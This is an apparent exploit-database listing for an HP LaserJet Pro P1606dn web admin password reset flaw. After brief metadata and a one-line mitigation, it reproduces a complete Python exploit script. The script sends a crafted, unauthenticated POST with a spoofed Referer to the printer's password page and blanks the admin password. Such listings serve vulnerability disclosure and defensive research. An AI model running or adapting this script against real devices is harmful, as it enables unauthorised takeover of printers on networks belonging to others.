HP LaserJet Pro P1606dn Webadmin password reset

vendor:

LaserJet Pro P1606dn

by:

m3tamantra

7,5

CVSS

HIGH

Password Reset

287

CWE

Product Name: LaserJet Pro P1606dn

Affected Version From: 20100223

Affected Version To: 20100223

Patch Exists: NO

Related CWE: N/A

CPE: h:hp:laserjet_pro_p1606dn

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2013

HP LaserJet Pro P1606dn Webadmin password reset

This exploit is used to reset the password of HP LaserJet Pro P1606dn Webadmin. It uses the cgi-bin/ip_password_result.htm page to reset the password. The exploit adds a Referer and User-Agent header to the request and sends it to the printer IP address.

Mitigation:

Ensure that the web application is configured to use strong authentication and authorization mechanisms.

Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: HP LaserJet Pro P1606dn Webadmin password reset
# Date: 20.05.2013
# Exploit Author: m3tamantra (http://m3tamantra.wordpress.com/blog)
# Vendor Homepage: http://www8.hp.com/de/de/products/printers/product-detail.html?oid=4110411 
# Firmware Date: 20100223

import urllib2

ip = '192.168.1.2' # Printer IP

req = urllib2.Request('http://'+ip+'/cgi-bin/ip_password_result.htm', data='ID_p+184=&ID_p+184=&Apply=%C3%9Cbernehmen')
req.add_header('Referer', 'http://'+ip+'/SSI/Auth/ip_password.htm')
req.add_header('User-Agent', 'Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1')

f = urllib2.urlopen(req)
if f.getcode() == 200:
    print 'Password reset successfully\nHave a nice day ;-)'
else:
    print 'Exploit fail :'+f.getcode()